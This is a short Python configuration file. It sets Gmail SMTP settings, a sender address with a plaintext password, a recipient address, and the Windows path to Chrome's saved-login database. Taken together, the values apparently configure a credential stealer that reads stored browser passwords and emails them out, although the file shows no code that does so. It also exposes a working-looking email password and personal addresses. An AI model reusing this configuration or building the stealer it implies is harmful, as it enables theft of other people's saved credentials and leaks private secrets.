SERVER_HOST = 'smtp.gmail.com'
SERVER_PORT = 587

FROM_EMAIL = 'xablau.mpx@gmail.com'
FROM_PASSWORD = 'ymyrwjthoikqpjus'
TO_EMAIL = 'vinibruno99@gmail.com'

LOGIN_PATH = 'AppData\\Local\\Google\\Chrome\\User Data\\default\\Login Data'